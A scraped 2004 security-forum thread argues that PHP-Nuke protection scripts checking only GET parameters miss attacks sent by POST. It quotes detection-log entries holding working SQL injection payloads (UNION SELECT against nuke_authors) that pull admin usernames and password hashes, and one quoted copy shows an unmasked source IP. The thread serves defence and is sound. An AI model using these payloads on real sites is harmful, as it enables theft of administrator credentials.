Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: June 17, 2025 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 47 Members: 0 Total: 47 Full disclosure SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path Local information disclosure in apport and systemd-coredump Stored XSS via File Upload - adaptcmsv3.0.3 IDOR "Change Password" Functionality - adaptcmsv3.0.3 Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Authenticated File Upload to RCE - adaptcmsv3.0.3 Stored XSS in "Description" Functionality - cubecartv6.5.9 Multiple Vulnerabilities in SAP GuiXT Scripting CVE-2024-47081: Netrc credential leak in PSF requests library Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpNuke -> Caution, fortress & co are useless View previous topic :: View next topic Caution, fortress & co are useless Posted: Sun Jun 06, 2004 10:11 am Tora Regular user Joined: May 19, 2004 Posts: 9 Location: Germany Here are 3 examples from our detection log files: Quote: request: _GET[name] = Encyclopedia _POST[file] = search _POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/* _COOKIE[lastvisita] = 1086277415 Serverinfo: REMOTE_ADDR: 82.xxx.xxx.xxx QUERY_STRING: name=Encyclopedia REQUEST_URI: /modules.php?name=Encyclopedia Quote: request: _GET[name] = Journal _POST[file] = search _POST[disp] = search _POST[bywhat] = aid _POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/* _COOKIE[lastvisita] = 1086277415 Serverinfo: REMOTE_ADDR: 82.xxx.xxx.xxx QUERY_STRING: name=Journal REQUEST_URI: /modules.php?name=Journal Quote: request: _GET[name] = FAQ _POST[myfaq] = yes _POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/* Serverinfo: REMOTE_ADDR: 82.xxx.xxx.xxx QUERY_STRING: name=FAQ REQUEST_URI: /modules.php?name=FAQ As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless. Here is a critical report over an older version of fortress. In addition, most described applies to the new version. http://vkp.shiba.de/doku/fortress.htm Sorry, only in german language... best wishes and greetings from germany Andi (aka Tora) Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total Posted: Sun Jun 06, 2004 11:16 am SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia I never installed that shits of protect .. _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- Posted: Sun Jun 06, 2004 2:36 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman Quote: As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless. Script Kiddie A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability Posted: Sun Jun 06, 2004 4:00 pm Tora Regular user Joined: May 19, 2004 Posts: 9 Location: Germany Quote: Script Kiddie Who is the script kiddie _________________ Greetings from Germany Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team Posted: Sun Jun 06, 2004 5:35 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Tora knows the stuff, its obvious from his posts. Scriptkiddies are beginners, who are learned, how to USE exploits, but they are not YET understanding fully, how it works. Tora has by my opinion advanced knowledge/skills in phpnuke/mysql and other stuff, he/she is definately not a scriptkiddie argentino wrote: Quote: As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless. Script Kiddie A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability Re: Caution, fortress & co are useless Posted: Sun Jun 06, 2004 5:39 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Yes, you are absolutely right - sanityzing only the GET parameters/QUERY string is useless and POST and COOKIE variables must be sanitized too. Because phpnuke globalizes all the GET/POST/COOKIE parameters and its not hard to attacker to inject mailicious requests through COOKIE for example... I suggest to use Sentinel protection system. Its my favorite in this moment and it will add good security layer between potential attackers and website. Tora wrote: Here are 3 examples from our detection log files: Quote: request: _GET[name] = Encyclopedia _POST[file] = search _POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/* _COOKIE[lastvisita] = 1086277415 Serverinfo: REMOTE_ADDR: 82.142.140.62 QUERY_STRING: name=Encyclopedia REQUEST_URI: /modules.php?name=Encyclopedia Quote: request: _GET[name] = Journal _POST[file] = search _POST[disp] = search _POST[bywhat] = aid _POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/* _COOKIE[lastvisita] = 1086277415 Serverinfo: REMOTE_ADDR: 82.142.140.62 QUERY_STRING: name=Journal REQUEST_URI: /modules.php?name=Journal Quote: request: _GET[name] = FAQ _POST[myfaq] = yes _POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/* Serverinfo: REMOTE_ADDR: 82.142.140.62 QUERY_STRING: name=FAQ REQUEST_URI: /modules.php?name=FAQ As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless. Here is a critical report over an older version of fortress. In addition, most described applies to the new version. http://vkp.shiba.de/doku/fortress.htm Sorry, only in german language... best wishes and greetings from germany Andi (aka Tora) Caution, fortress & co are useless www.waraxe.us Forum Index -> PhpNuke You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.039 Seconds